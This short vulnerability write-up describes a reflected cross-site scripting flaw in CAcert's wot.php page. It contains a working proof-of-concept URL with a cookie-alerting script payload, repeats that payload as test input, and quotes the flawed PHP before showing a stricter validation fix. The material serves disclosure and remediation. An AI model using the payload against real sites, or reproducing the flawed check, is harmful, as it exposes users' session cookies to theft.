https://www.cacert.org/wot.php?id=9&userid=1%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
Logic race condition: intval() takes only the 1, the test passes, and the unchecked $_REQUEST['userid']
makes the rest (pages/wot/9.php).
$res = mysql_query("select * from `users` where `id`='".intval($_REQUEST['userid'])."' and `listme`='1'");
if(mysql_num_rows($res) <= 0)
{
echo _("Sorry, I was unable to locate that user, the person doesn't wish to be contacted, or isn't an assurer.");
} else {
....
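
The mismatch described above, shown next to a stricter check. This is an added example, not CAcert's code: parse_userid() and render_contact_field() are hypothetical helpers, and the hidden form field is an assumed stand-in for wherever the rest of the page reuses the request value.

```php
<?php
// Added illustration, not CAcert's code. Helper names and the hidden-field
// sink are assumptions made for this example.

// Strict parse: accept only a canonical positive decimal integer.
// intval('1"><script>...') returns 1, so intval() alone hides trailing junk.
function parse_userid($raw): ?int
{
    if (!is_string($raw) || !preg_match('/\A[1-9][0-9]{0,9}\z/', $raw)) {
        return null;
    }
    return (int)$raw;
}

// Emit only the validated integer, and still escape for the attribute context.
function render_contact_field(int $userid): string
{
    return '<input type="hidden" name="userid" value="'
        . htmlspecialchars((string)$userid, ENT_QUOTES, 'UTF-8') . '">';
}

// Constructed inputs: the value from the report's URL, a clean id, and edge cases.
$samples = ['1"><script>alert(document.cookie);</script>', '1', '01', ''];

foreach ($samples as $raw) {
    $loose  = intval($raw);        // what the database lookup in the report sees
    $strict = parse_userid($raw);  // one validated value for lookup and output

    printf("raw=%-48s intval=%d strict=%s\n",
        var_export($raw, true), $loose, var_export($strict, true));

    if ($strict === null) {
        // Reject rather than continue with a value that differs from what was checked.
        echo "  -> rejected\n";
        continue;
    }
    echo '  -> ' . render_contact_field($strict) . "\n";
}
```

For the first sample, intval() yields 1 and the lookup would succeed, while the strict parse rejects the request, so the checked value and the value written to the page can no longer differ.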